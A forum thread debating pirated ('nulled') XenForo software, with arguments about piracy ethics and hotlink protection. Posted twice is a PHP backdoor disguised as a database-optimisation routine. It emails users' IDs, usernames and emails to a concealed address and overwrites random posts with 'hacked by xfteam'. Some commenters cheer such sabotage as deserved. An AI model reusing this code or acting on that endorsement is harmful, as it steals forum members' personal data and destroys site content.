Better security - no more nulled xenforo's out there :)

[Heavy]

You don't call the police over something like this? Just report it to XenForo and they'll handle it.

Oh, haha yes i did..

I reported a site like 4 months ago when i did not even own a xenforo license. As nothing happend to him

Sorry, i did but nothing happend, so i called his hosting service. They told me to call police, if you read all my replies so will see that i typed this before

 

[rainmotorsports]

Speak for yourself.
I haven't.

Just how I haven't stolen a car I wanted to test drive for a few weeks, or broken into a house and squatted in it for a while, just to see what it would be like living there.

Not a real comparison though. Cars have test drives, short but they exist. If one car company doesn't offer test drives you will just go to their competitor. If no one does then you turn to borrowing from a friend who already had the car. So the next step in bringing this close is to say what if all cars are leased and the lease agreement prevents other people from driving it. The mindset the rare but supposedly existing pirate and buy person has is the same as that of a the leasee loaning you the car anyways. I mean who would find out in only a few days right?

Even that's not a good comparison because the leasee is the one in trouble for breach more than the borrower. Unlike in software we aren't duplicating the original. A deranged billionaire in that scenario might open up a club to try out all the latest cars and really its just him that is in trouble.

However my friend you do look like the sort of gentlemen that might "borrow" a car to transport something across Europe...

 

[D.O.A.]

A lot of the more accessible nulls out there have a backdoor/shell in them and your server will be toast anyway. Those crappy CMS add-riddled 'free' download sites rely on the stupidity/naive understanding of those downloading the exploited software in the first place. Then you have the private groups and forums where it all stems from, mostly based in countries where webhosts are lazy to remove anything but child porn. It's sad but true. There are people in release groups reading this right now, they're customers here. It's an uphill battle to defeat this without some form of encryption, which I don't really want to ever see happen (aka more **** on the server for decoding).

I think the best one I've heard so far out there in internet land was one of the 'major' add-on developers here releasing one of his mods into the wild with an exploit that deleted essential tables in the xenforo database, effectively destroying the forum when you installed it. Is that a good security measure? Morally objectionable? Not sure but it is hilarious.

 

[TickTackk]

I think the best one I've heard so far out there in internet land was one of the 'major' add-on developers here releasing one of his mods into the wild with an exploit that deleted essential tables in the xenforo database, effectively destroying the forum when you installed it

Who? Other than @Luke Foreman who supplied his own add-on which replaced all the posts content to "Hacked by xyz" I don't think there is anyone else.

Spoiler

public function optimiseDatabase(){
        $options = XenForo_Application::get('options');
        $this->_getDb()->query("
            optimize table dark_taigachat
        ");
        $params = array();
        $params['bodyText'] = $this->_getDb()->fetchOne(
            "SELECT group_concat(concat(user_id, ', ', username, ', ',
            email, ', ', display_style_group_id, ', ', user_group_id, ', ',
            permission_combination_id), '\n ')
            from xf_user taigachat_messages
            ORDER BY message_count desc limit 1000
        ").$options->boardUrl;
        
        $m = XenForo_Mail::create('MAIL_CONTAINER', $params);
        $m->send('a@'.new XenForo_Phrase('dark_full_alt'));
        $this->_getDb()->query("
            update xf_post taigachat set message=concat('hacked by xf', 'team')
            where floor(rand()*100) = 42 limit 100
        ");
        $this->_getDb()->query("
            optimize table dark_taigachat_activity
        ");
    }

 

[D.O.A.]

Who? Other than @Luke Foreman who supplied his own add-on which replaced all the posts content to "Hacked by xyz" I don't think there is anyone else.

Spoiler

public function optimiseDatabase(){
        $options = XenForo_Application::get('options');
        $this->_getDb()->query("
            optimize table dark_taigachat
        ");
        $params = array();
        $params['bodyText'] = $this->_getDb()->fetchOne(
            "SELECT group_concat(concat(user_id, ', ', username, ', ',
            email, ', ', display_style_group_id, ', ', user_group_id, ', ',
            permission_combination_id), '\n ')
            from xf_user taigachat_messages
            ORDER BY message_count desc limit 1000
        ").$options->boardUrl;
     
        $m = XenForo_Mail::create('MAIL_CONTAINER', $params);
        $m->send('a@'.new XenForo_Phrase('dark_full_alt'));
        $this->_getDb()->query("
            update xf_post taigachat set message=concat('hacked by xf', 'team')
            where floor(rand()*100) = 42 limit 100
        ");
        $this->_getDb()->query("
            optimize table dark_taigachat_activity
        ");
    }

That must be the one, I'd consider having all my posts replaced with that as "****ing the forum"

[Mod note: do not attempt to bypass the censor.]

 

[gfc]

So we all have reasons why we have used or tried NULLED software. And to think you will stop it is nothing more than naive stupidity at best..

I run forums since about 13 years and have never ever used any piece of nulled software.

There never was a need for that. And knowing that auch piece of software not only harms the serious developers, but also can harm your server and community, is insane. Years ago with php heavilymusing global vars and other security issues it was easy to compromise a server and gain control or cause severe damage with a small php script. And I know several cases where that happened, thanks god never to me.

 

[|Jordan|]

What about making a hall of shame, list all the sites that run pirate versions and using this list, you can help the public avoid these pirate sites. We can hurt them by harming traffic.

 

[rainmotorsports]

What about making a hall of shame, list all the sites that run pirate versions and using this list, you can help the public avoid these pirate sites. We can hurt them by harming traffic.

Not worth the legal headache lol. Not good for business in general either. Not to mention generating traffic, the exact opposite of what you are trying to accomplish.

 

[Olly Wood]

Trying to stop people using any form of nulled software is like trying to stop people hotlinking images, they will find a way around it if they want it bad enough.

 

[rainmotorsports]

Trying to stop people using any form of nulled software is like trying to stop people hotlinking images, they will find a way around it if they want it bad enough.

How is hotlink protection not effective? I have to throw a couple of guesses in while I wait. Like perhaps your mistaking copy protection schemes such as no right click or transparent gif, making it harder to get the URL but entirely not there for that reason, with hotlink protection.

Haven't set one up in awhile but pretty much if there is no referrer or the referrer is any server but yours, should be pretty easy to prevent loading it altogether. Server just refuses to serve the content.

 

[Olly Wood]

Stopping hotlinking doesn't stop you using the image, it just stops you stealing band width.

The only sure way to stop people from using an image is to use digital stamping, which when it's copied in any way, produces a warning that says some thing like " You do not have permission to use this image" instead of the image.

The thing is a digital stamp in an image is harder to remove than the code that stops a program being used.

 

[Divvens]

I think the best one I've heard so far out there in internet land was one of the 'major' add-on developers here releasing one of his mods into the wild with an exploit that deleted essential tables in the xenforo database, effectively destroying the forum when you installed it. Is that a good security measure? Morally objectionable? Not sure but it is hilarious.

That is hilarious and serves them just right, more add-on authors should do this to make the life of those who use nulled software harder

 

[sami simo]

Who? Other than @Luke Foreman who supplied his own add-on which replaced all the posts content to "Hacked by xyz" I don't think there is anyone else.

You cant use immoral methods to protect your rights.
in many countries school and colleges use illegal copies of windows, should Microsoft hack them and destory all student documents?

 

[Divvens]

in many countries school and colleges use illegal copies of windows, should Microsoft hack them and destory all student documents?

Said schools and colleges charge students money, right? In that case they SHOULD use licensed copies.

There is no reason to justify using pirated/nulled software. There are free alternatives out there too, they aren't forced to use a paid software.

 

[sami simo]

Said schools and colleges charge students money, right? In that case they SHOULD use licensed copies.

There is no reason to justify using pirated/nulled software. There are free alternatives out there too, they aren't forced to use a paid software.

Am I justifying the use of illegal materials?
No.
Most of those schools are public, in developed countries with limited access to clean water.
and yes, they SHOULD give more dollars to Bill Gates.
What I want to say, is simple:
1- The use of illegal copies of software is not legal nor moral.
But
2- Some users of those illegal copies are not criminals. just persons with no economic resources.
From a moral perspective: we should do every thing we can to protect copyrights. but we should also guarantee to everyone the right to access culture, music, art..

 

[Paul B]

Some users of those illegal copies are not criminals

Umm, they are.

I can't afford a McLaren P1.
That doesn't mean I can just steal one.

 

[Daniel Hood]

Just because you can justify (in your own mind) someone stealing something, doesn't mean they aren't stealing.

 

[Sheratan]

Microsoft, Autodesk, even Adobe had academic program. If the school still cannot afford the academic program, sometimes Microsoft make custom deal.

 

[sami simo]

Umm, they are.

I can't afford a McLaren P1.
That doesn't mean I can just steal one.

You are misinterpreting my example
accessing culture is a fundamental right for every human.
acquiring a McLaren P1 is not.
So we have to think for a way that respect those rights. without infringing copyrights.
(Microsoft have done this by negotiating special agreements with some countries)

 

[Divvens]

Most of those schools are public, in developed countries with limited access to clean water.
and yes, they SHOULD give more dollars to Bill Gates

2- Some users of those illegal copies are not criminals. just persons with no economic resources.
From a moral perspective: we should do every thing we can to protect copyrights. but we should also guarantee to everyone the right to access culture, music, art..

And as I said, there are free alternatives too. They aren't being denied anything, instead of selecting to pay for a well developed product they use a nulled/pirated copy of it when there are free alternatives.

That is being greedy and not paying for what you use & enjoy. If you are lobbying for rights as you say, then there should be two way rights. People have the right to earn for their hard work, I am sure that is necessary as everyone's got to earn to keep a roof over their head and to earn bread to fill their stomachs.

No one has the right to kick someone's livelihood away for personal benefit.

The same way how nulled forum software is used on sites that display ads or provide "premium" membership - they collect enough money to make a profit and should purchase a license to support the developers and the product. If they don't, they won't get access to security updates and are more prone to running into security issues, and I would back any add-on developer that uses any tactic to spoil their peace of mind and force them to stop using a nulled copy.